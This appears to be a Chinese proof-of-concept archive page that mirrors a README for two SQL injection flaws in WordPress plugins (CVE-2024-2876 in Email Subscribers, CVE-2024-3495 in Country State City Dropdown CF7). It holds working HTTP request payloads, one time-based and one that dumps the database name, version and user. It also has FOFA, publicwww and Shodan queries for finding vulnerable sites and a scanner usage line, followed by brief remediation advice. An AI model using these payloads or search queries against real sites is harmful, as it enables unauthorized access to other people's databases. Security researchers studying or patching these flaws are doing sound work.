关联漏洞
标题:
WordPress Plugin email-subscribers SQL注入漏洞
(CVE-2024-2876)
描述:WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress Plugin email-subscribers 5.7.14及之前版本存在SQL注入漏洞,该漏洞源于 IG_ES_Subscribers_Query 中的 run函数对用户提供的参数转义不充分,攻击者利用该漏洞可以将额外的 SQL 查询附
描述
WP-SQL-Injection CVE-2024-2876 AND 2024-CVE-2024-3495
介绍
---
# WP-SQL Injection Vulnerabilities: CVE-2024-2876 and CVE-2024-3495
This repository documents two SQL injection vulnerabilities affecting WordPress plugins. Below are descriptions, queries, proof of concept (PoC) scripts, and remediation steps for each vulnerability.
## Vulnerability Descriptions
### Description - CVE-2024-2876
The **Email Subscribers by Icegram Express** plugin for WordPress (versions up to 5.7.14) is vulnerable to SQL injection in the `run` function of the `IG_ES_Subscribers_Query` class. Due to insufficient escaping and lack of SQL query preparation, unauthenticated attackers can exploit this vulnerability to inject malicious SQL, potentially accessing sensitive data.
### Description - CVE-2024-3495
The **Country State City Dropdown CF7** plugin for WordPress (versions up to 2.7.2) is vulnerable to SQL injection via the `cnt` and `sid` parameters. This insufficient escaping allows unauthenticated attackers to execute arbitrary SQL commands, leading to unauthorized access to sensitive database information.
## Scanner Script
To scan for vulnerabilities in CVE-2024-2876 and CVE-2024-3495, use the following script:
```bash
python3 CVE-2024-2876.py -u http://website.com
python3 CVE-2024-2876.py -f urls.txt
```
## Querying for Affected Sites
### Query for CVE-2024-2876
- **FOFA**: `body="/wp-content/plugins/email-subscribers/"`
- **publicwww**: `"/wp-content/plugins/email-subscribers/"`
### Query for CVE-2024-3495
- **FOFA**: `body="/wp-content/plugins/country-state-city-auto-dropdown" && header="HTTP/1.1 200 OK"`
- **Publicwww**: `"/wp-content/plugins/country-state-city-auto-dropdown"`
- **Shodan**: `"http.title:admin-ajax.php"`
## Proof of Concept (PoC) Code Blocks
### PoC - CVE-2024-2876
Example exploit using the SQL injection vulnerability via the `admin-post.php` endpoint:
```bash
@timeout: 20s (using burpsuite)
POST /wp-admin/admin-post.php HTTP/1.1
Host: <Host>
Content-Type: application/x-www-form-urlencoded
page=es_subscribers&is_ajax=1&action=_sent&advanced_filter[conditions][0][0][field]=status=99924)))union(select(sleep(4)))--+&advanced_filter[conditions][0][0][operator]==&advanced_filter[conditions][0][0][value]=1111
```
### PoC - CVE-2024-3495
Example exploit using `admin-ajax.php`:
```bash
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: <Host>
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 172
action=tc_csca_get_states&nonce_ajax={{nonce}}&cnt=1+or+0+union+select+concat(0x64617461626173653a,database(),0x7c76657273696f6e3a,version(),0x7c757365723a,user()),2,3--+-
```
## Remediation Steps
### Remediation for CVE-2024-2876
- **Upgrade**: Update the plugin to version 5.7.15 or later (preferably 5.7.19).
- **Automatic Updates**: Patchstack users can enable automatic updates for vulnerable plugins.
- **WAF/WAAP**: Implementing a Web Application Firewall (WAF) or Web Application and API Protection (WAAP) solution can offer protection against known vulnerabilities by blocking suspicious SQL patterns.
## Bounty Information - CVE-2024-2876
For more information on the CVE and bounty details, visit:
- [Wordfence Blog on CVE-2024-2876](https://www.wordfence.com/blog/2024/04/1250-bounty-awarded-for-unauthenticated-sql-injection-vulnerability-patched-in-email-subscribers-by-icegram-express-wordpress-plugin/)
---
文件快照
[4.0K] /data/pocs/a3bc78d8f796ee9aac53f3c7ae26677705f15ec7
├── [5.1K] CVE-2024-2876.py
├── [ 845] CVE-2024-2876.yaml
├── [ 944] CVE-2024-3495.yaml
└── [3.5K] README.md
0 directories, 4 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。